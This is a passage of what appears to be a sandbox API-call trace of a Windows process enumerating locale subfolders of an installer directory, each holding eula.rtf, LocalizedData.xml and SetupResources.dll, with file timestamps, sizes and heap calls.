ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0045.855] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.855] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1045\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42600c8 [0045.860] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.860] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.860] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.860] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.860] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.860] FindClose (in: hFindFile=0x42600c8 | out: hFindFile=0x42600c8) returned 1 [0045.861] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.861] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0045.861] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.861] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.862] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.862] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.863] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.863] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.863] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.863] FindClose (in: hFindFile=0x4260348 | out: hFindFile=0x4260348) returned 1 [0045.864] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.864] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0045.864] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.864] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260188 [0045.864] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.864] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.864] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.864] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.864] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.865] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0045.865] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.865] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0045.865] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.865] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260188 [0045.867] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.867] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.867] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.867] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.867] FindNextFileW (in: hFindFile=0x4260188, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.867] FindClose (in: hFindFile=0x4260188 | out: hFindFile=0x4260188) returned 1 [0045.868] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.868] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0045.868] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.868] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42600c8 [0045.869] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.869] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.869] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.870] FindNextFileW (in: hFindFile=0x42600c8, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.870] FindClose (in: hFindFile=0x42600c8 | out: hFindFile=0x42600c8) returned 1 [0045.871] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.871] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0045.871] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.871] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4260348 [0045.871] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.871] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0045.871] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0045.871] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0045.871] FindNextFileW (in: hFindFile=0x4260348, lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0045.871] FindClose (in: hFindFile=0x4260348 | out: hFindFile=0x4260348) returned 1 [0045.872] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x4240048 | out: hHeap=0x5d0000) returned 1 [0045.872] FindNextFileW (in: hFindFile=0x42602c8, lpFindFileData=0x2e4fa7c | out: lpFindFileData=0x2e4fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0045.872] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x4240048 [0045.872] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x2e4f800 | out: lpFindFileData=0x2e4f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, 